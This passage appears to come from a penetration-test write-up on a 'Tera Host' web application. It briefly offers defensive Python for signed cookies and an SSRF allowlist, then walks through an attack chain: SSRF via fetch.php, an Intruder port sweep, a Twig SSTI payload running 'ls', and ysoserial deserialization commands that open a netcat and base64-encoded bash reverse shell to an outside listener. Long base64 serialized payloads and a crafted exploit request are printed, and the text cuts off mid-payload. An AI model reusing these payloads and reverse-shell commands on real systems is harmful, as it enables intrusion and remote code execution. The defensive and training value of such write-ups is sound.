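SECRET_KEY = secrets.token_bytes(32)


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode("ascii"))


def issue_auth_cookie(uid: int, key: bytes = SECRET_KEY) -> str:
    """Plain JSON of the session facts plus an HMAC-SHA256 tag; no objects are serialized."""
    payload = json.dumps({"uid": uid}, separators=(",", ":")).encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def read_auth_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Verify the tag first; only then decode, and decode as data, not as a class."""
    try:
        payload_b64, tag_b64 = cookie.split(".")
        payload, tag = _unb64(payload_b64), _unb64(tag_b64)
    except ValueError:  # wrong shape or bad base64 (binascii.Error is a ValueError)
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # tampered or forged: stop before touching the payload
    try:
        data = json.loads(payload)
    except ValueError:
        return None
    uid = data.get("uid") if isinstance(data, dict) else None
    if not isinstance(uid, int) or uid not in USER_ROLES:
        return None
    return {"uid": uid, "role": USER_ROLES[uid]}


def tamper_uid(cookie: str, new_uid: int) -> str:
    """Replace the payload but keep the old tag: all a client without the key can do."""
    _, tag_b64 = cookie.split(".")
    forged = json.dumps({"uid": new_uid}, separators=(",", ":")).encode("utf-8")
    return f"{_b64(forged)}.{tag_b64}"


if __name__ == "__main__":
    cookie = issue_auth_cookie(500)
    print("valid   :", read_auth_cookie(cookie))
    print("tampered:", read_auth_cookie(tamper_uid(cookie, 1)))
```

Compared with the blog's scheme, the difference that matters is not encryption but authentication: AES-CTR with a fixed IV hides the bytes yet lets any client submit a modified ciphertext, while a keyed tag checked with a constant-time compare rejects every value the server did not itself issue.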

After getting Administrator rights and looking more into the code of the page, I see this:

src="9c717baeeca3a2c67f2c7797c96292ca/fetch.php"

So, on the profile page, the Administrator can import articles, etc. I will check more.

Opened the request in the Burpsuite browser.

Confirming that I am admin and going to the fetch.php that I found earlier.

Checked the Import.

Intercepted response in Burpsuite:

I noticed the URL parameter, so I will put 127.0.0.1 and check it.

Also I will try with Intruder to see if I can find any open ports; maybe I get lucky.

Added a check from 1 to 5100, each number as a payload step by step, and started the attack.

I found some nice lengths that indicated 3 open ports: 80, 631 and 5000.

When feasible, refrain from utilizing user-generated input in functions that can execute requests
on the server's behalf. If it is necessary to incorporate user-generated data into a URL, restrict the
web server's resource requests by employing a whitelist of approved domains and protocols. Due
to the multitude of potential attacker-initiated requests, blacklists should be avoided. Moreover,
disable unneeded URL schemes like file:///, ftp://, or gopher://, and ensure that authentication is
mandated for internal services such as Elasticsearch and MongoDB.
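The import feature reached 127.0.0.1 because the url parameter went straight into a server-side fetch. This added example (mine, not the report's and not Tera Host's code) implements the allowlist approach described above in Python: only http/https, only approved hosts and ports, no credentials in the URL, and the resolved address must be public, so an allowlisted name that points at an internal address is still refused. DNS is replaced by a constructed lookup table so the check runs offline; the host names and addresses are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}  # None means the scheme default
# Constructed allowlist of feed hosts the import feature is meant to reach.
ALLOWED_HOSTS = {"feeds.partner.example", "cdn.partner.example"}
# Constructed stand-in for DNS so the check runs offline; one allowlisted name
# resolves to an internal address and must still be refused.
FAKE_DNS = {
    "feeds.partner.example": "93.184.216.34",
    "cdn.partner.example": "10.0.0.5",
}


def resolve(host: str, dns=FAKE_DNS):
    """Lookup against the constructed table (a real deployment would resolve here)."""
    return dns.get(host)


def is_public_address(ip_text: str) -> bool:
    addr = ipaddress.ip_address(ip_text)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_import_url(url: str, dns=FAKE_DNS) -> tuple:
    """Return (allowed, reason). Everything not explicitly permitted is refused."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed url"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in url not allowed"
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return False, f"host {host!r} not on allowlist"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    ip_text = resolve(host, dns)
    if ip_text is None:
        return False, "host does not resolve"
    if not is_public_address(ip_text):
        return False, f"{host} resolves to non-public address {ip_text}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("https://feeds.partner.example/rss.xml",
                      "http://127.0.0.1:5000/",
                      "file:///etc/passwd",
                      "http://cdn.partner.example/feed"):
        print(candidate, "->", validate_import_url(candidate))
```

One caveat when this is wired to real DNS: connect to the address that was validated, not to the name again, otherwise a second resolution can return a different answer and bypass the public-address check. Refused URLs are also worth logging, since a request for 127.0.0.1 with a sweep of ports is exactly the Intruder pattern used in this assessment.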

This was an SSRF attack.


As shown on the PortSwigger website:

Server-Side Request Forgery (SSRF) is a web security flaw that enables an attacker to
manipulate a server-side application into making requests to unintended destinations. Typically, in
an SSRF attack, the perpetrator might compel the server to connect to internal-only services
within the organization's infrastructure. Alternatively, they could force the server to establish
connections with arbitrary external systems, potentially exposing sensitive information like
authorization credentials.
A successful SSRF assault can frequently lead to unauthorized actions or data access within the
organization, either in the compromised application itself or in other backend systems with which
the application communicates. In certain cases, an SSRF vulnerability might allow the attacker to
execute arbitrary commands. An SSRF exploit that triggers connections to external third-party
systems could result in malicious follow-up attacks that seemingly stem from the organization
hosting the vulnerable application.

Checking if I can ping my IP using Burp and that url parameter (opening a netcat listener):

Seems I can hit my listener! That’s good.

Also found on the port 5000 request that it asks for a name:

Checking for Twig SSTI, the reference link I followed is https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Seems good again, checking to catch the first reverse shell now!

I will check payloads from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md, and one of them gave me 'ls' output in the response successfully:

config.__class__.__init__.__globals__['os'].popen('ls').read()

This is not a standalone Python script but a template expression: starting from the 'config' object the
template engine exposes, it walks to the object's class, then to the '__init__' method's '__globals__'
dictionary, in which the 'os' module is available, and calls 'popen' with 'ls' and reads the output, so
the command output is rendered into the response.

I will check this out further with more tests, cooling the heat in my head. This is crazy.
Moving further, I will check the 1337 port and see what I get.

So, sending it to Repeater and playing around with it:

We can notice that the application necessitates a parameter called "data." However, when
attempting to upload something, the application indicates that base64 encoding must be employed
while in Java mode.

I can use ysoserial, like in the training material, to generate a payload which I can add and get my
first reverse shell.

Let's see how it goes.

Downloaded from https://github.com/frohoff/ysoserial/releases/tag/v0.0.6 the ysoserial.jar file first.


Running it shows this (how to use it):

Now I will create my payload:

java -jar ysoserial-all.jar CommonsBeanutils1 "nc 10.100.13.200 1324" | base64 | tr -d '\n' > payload.txt

An error occurred during the generation or serialization of the payload:

java.lang.IllegalAccessError: The class ysoserial.payloads.util.Gadgets (in an unnamed module
@0x4015e7ec) is unable to access the class
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in the java.xml module) because the
java.xml module does not export com.sun.org.apache.xalan.internal.xsltc.trax to the unnamed
module @0x4015e7ec.
The error occurred at:

ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)

ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20)

ysoserial.GeneratePayload.main(GeneratePayload.java:34)

Hm... I will do some debugging, and it will take me some time now.

Checking http://www.jrasp.com/case/CVE-2021-26295.html I saw something new.

Let's see... Found it: https://forum.portswigger.net/thread/ysoserial-stopped-working-b5a161f42f

Got it, I had to uninstall and reinstall Java JDK 11 so ysoserial can work.

java -jar ysoserial-all.jar CommonsBeanutils1 "nc 10.100.13.200 1234" | base64 | tr -d '\n' > payload.txt

This is the payload:

rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGls
L0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIA
AkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25z
LmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRp
ZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8Fu
rKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2
YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAA
AAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAABqfK/rq+AAAAMgA5CgADACIHADcHACUH
ACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAP
TGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNs
YXNzZXMBADVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEA
cihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50
ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94
YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2Vy
aWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4v
aW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNv
bS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9y
AQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9z
dW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAM
R2FkZ2V0cy5qYXZhDAAKAAsHACgBADN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQB
AEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAUamF2YS9p
by9TZXJpYWxpemFibGUBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24B
AB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzAQAIPGNsaW5pdD4BABFqYXZhL2xhbmcvUnVudGltZQcAKgEACmdldFJ1
bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMACwALQoAKwAuAQAVbmMgMTAuMTAwLjEzLjIwMiAxMjM0CAAwAQAEZXhlYwEA
JyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2Vy
aWFsL1B3bmVyMzE1NTcyNjE1MTgwMwEAHkx5c29zZXJpYWwvUHduZXIzMTU1NzI2MTUxODAzOwAhAAIAAwABAAQAAQAaAAUABgAB
AAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQAT
ABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZ
AAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgAB
AAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAA
AAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AEAAAAdTK/rq+AAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxW
ZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRh
YmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMv
dXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMv
dXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXls
b2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEA
AAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4cQB+
AA14

Now I will upload the payload file to the Repeater of Burp Suite and launch the attack on the web application.

BUT it failed... so I had to do more digging to find the right payload. I did this manually, also
downloaded A LOT of versions of ysoserial, and installed JDK 11 again.

The final payload was created with the following command:

java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMDAuMTMuMjAzLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}' | base64 -w0 | sed 's/+/%252b/g'

Where YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMDAuMTMuMjAzLzg4ODggMD4mMQ== is the base64 encoding of:

It gave me the following payload:

rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVt
YmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5N
YXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlv
bkhhbmRsZXI7eHBzcQB%252bAABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQD
AAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hl
LmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJz
dAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMu
Y29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAJzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25z
LmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hw
dnIAN2NvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IA
Pm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnN0YW50aWF0ZVRyYW5zZm9ybWVyNIv0f6SG0DsCAAJb
AAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2
YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAXNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMu
dHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVz
dAADW1tCWwAGX2NsYXNzcQB%252bABhMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAW
TGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhw
AAAG88r%252bur4AAAAyADkKAAMAIgcANwcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPz
kd3vPgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAT
U3R1YlRyYW5zbGV0UGF5bG9hZAEADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJU
cmFuc2xldFBheWxvYWQ7AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9N
O1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9j
dW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1
bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcB
AKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50
ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1Nlcmlh
bGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhp
c0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6
YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAxHYWRnZXRzLmphdmEMAAoACwcAKAEAM3lzb3NlcmlhbC9wYXlsb2Fkcy91dGls
L0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50
aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRl
cm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMBAAg8Y2xpbml0PgEA
EWphdmEvbGFuZy9SdW50aW1lBwAqAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwALAAtCgArAC4BAGFiYXNo
IC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNQzR4TURBdU1UTXVNakF6THpnNE9EZ2dNRDRtTVE9PX18e2Jh
c2U2NCwtZH18e2Jhc2gsLWl9CAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAz
CgArADQBAA1TdGFja01hcFRhYmxlAQAceXNvc2VyaWFsL1B3bmVyNjE1MjM3MDExNzUxOAEAHkx5c29zZXJpYWwvUHduZXI2MTUy
MzcwMTE3NTE4OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAA
AAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAA
AAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAA
ADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQA
AwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACXVxAH4AIwAAAdTK/rq%
252bAAAAMgAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8
aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElu
bmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5q
YXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZh
L2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAA
AgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA8AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIA
FAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4dXIAEltMamF2YS5sYW5nLkNsYXNzO6sW167LzVqZAgAAeHAAAAABdnIAHWph
dmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAK
bG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAA
AAB4cHEAfgAu

So I had to put this in the request in Burp Suite:

GET /9c717baeeca3a2c67f2c7797c96292ca/fetch.php?url=127.0.0.1:1337/?data=rO0ABXNyADJzdW4ucmVmbGVjdC5
hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXR
pbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmx
lY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB%252bAAB
zcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9
hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnM
uZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1
vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3J
tZXI7vVYq8dg0GJkCAAB4cAAAAAJzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJ
hbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAN2NvbS5zdW4ub3JnLmFwYWN
oZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRyQVhGaWx0ZXIAAAAAAAAAAAAAAHhwc3IAPm9yZy5hcGFjaGUuY29tbW9ucy5
jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnN0YW50aWF0ZVRyYW5zZm9ybWVyNIv0f6SG0DsCAAJbAAVpQXJnc3QAE1tMamF2YS9sYW5
nL09iamVjdDtbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHM
pbAIAAHhwAAAAAXNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVd
PwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzcQB%252
bABhMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWV
zO3hwAAAAAP////91cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAAG88r%252bur4AAAAyADkKAAM
AIgcANwcAJQcAJgEAEHNlcmlhbFZlcnNpb25VSUQBAAFKAQANQ29uc3RhbnRWYWx1ZQWtIJPzkd3vPgEABjxpbml0PgEAAygpVgE
ABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATU3R1YlRyYW5zbGV0UGF5bG9hZAE
ADElubmVyQ2xhc3NlcwEANUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJFN0dWJUcmFuc2xldFBheWxvYWQ7AQAJdHJ
hbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2h
lL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmc
vYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnR
lcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACcBAKYoTGNvbS9zdW4vb3JnL2FwYWN
